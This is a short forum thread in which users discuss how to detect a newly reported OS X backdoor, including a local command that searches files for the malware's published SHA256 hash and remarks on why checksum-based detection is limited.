Sophisticated OS X Backdoor Discovered

[darksaints]

Is there any diagnostic tool out there to determine if you've been infected?

[atdt]

I whipped up https://gist.github.com/atdt/e84483c70c078a72f5e08ead365c69f... based on the information in the report.

[clinton_sf]

> Is there any diagnostic tool out there to determine if you've been infected?

From what I can tell, they posted the SHA256 of the offending binary under the IOCs section of that web page. So you should be able to do this in the root of your home directory to detect if such a file exists:

# find . -type f -print0 | xargs -0 shasum -a 256 | grep 664e0a048f61a76145b55d1f1a5714606953d69edccec5228017eb546049dc8c

[drdrey]

Binary checksums are usually not very helpful for identifying malware. The fact that the binary they were looking at was called "unpacked" suggests that there would be packed versions out there, and they would have a different checksum.

[clinton_sf]

Yes. And the malware could be polymorphic. Or there could be multiple versions of the same "core" out there. It's not clear to me how sophisticated virus (malware) scanners for OS X are with dealing with that.

[lm2s]

From what I know (which is not much) scanners, among other things, search for identifying patterns in files. So there is an identifying pattern of each discovered malware/virus in a database.

[Chilinot]

I assume this has been added to Kaspersky's anti-virus suite considering it is their blog post.

[20yrs_no_equity]

Apple keeps gatekeeper and another process up to date, effectively scanning for this kind of stuff is built into the OS.